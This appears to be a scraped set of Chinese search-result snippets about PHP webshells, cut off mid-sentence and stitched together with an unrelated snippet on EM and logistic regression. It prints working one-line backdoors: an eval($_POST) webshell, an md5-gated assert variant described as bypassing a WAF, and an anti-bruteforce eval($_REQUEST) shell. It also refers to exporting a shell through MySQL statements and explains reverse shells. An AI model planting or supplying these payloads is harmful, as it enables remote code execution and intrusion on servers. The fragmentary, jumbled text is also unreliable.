1.mysql执行语句拿shell 2.利用md5绕过waf <?php if(md5(@$_GET['a']) =='2858b958f59138771eae3b0c2ceda426'){ assert($_POST['a']); } ?> ...

PHP一句话：1、普通一句话 <!--?php @eval($_POST['ki11']);?--> 2、防爆破一句话 <!--?php substr(md5($_REQUEST['x']),28)=='6862'&&eval($_REQUEST['ki11 ...

很老的东西了，但是很多时候会派上用场 mysql一句话导出shell Drop TABLE IF EXISTS temp; //如果存在temp就删掉Create TABLE temp ...

em，是一种含有隐含变量的概率模型参数的极大似然估计法。主要应用在机器学习以及计算机视觉的数据聚类领域。 lr，逻辑回归，本质也是线性回归，通过拟合拟合样本的某个曲线，然后使用逻辑函数进行区间缩放， ...

反弹shell背景： 想要搞清楚这个问题，首先要搞清楚什么是反弹，为什么要反弹。假设我们攻击了一台机器，打开了该机器的一个端口，攻击者在自己的机器去连接目标机器（目标ip：目标机器端口），这是比较常规的形式，我们叫做正向连接。远程桌面，web服务，ssh，telnet ...

一、基础类的一句话--功能仅限于验证漏洞了，实际中太容易被查出出来： 相信一目了然可以看懂如何使用这类一句话。 如果有疑问可以看我的博客PHP后门的eval类和system类 函数到底有哪些区别 二、编码的替换的类型： 三、乱七八糟类型 ...

...

<?php @eval($_POST[pp]);?> 这是一段PHP木马代码，也就是我们所说的后门程序 为什么说这段代码是后门程序？ 其实这段代码属于基础类的一句话，功能仅限于验证漏洞了，实际中太容易被查出来了， 这个是PHP最常见的一句话木马的源码，通过post木马程序来实现 ...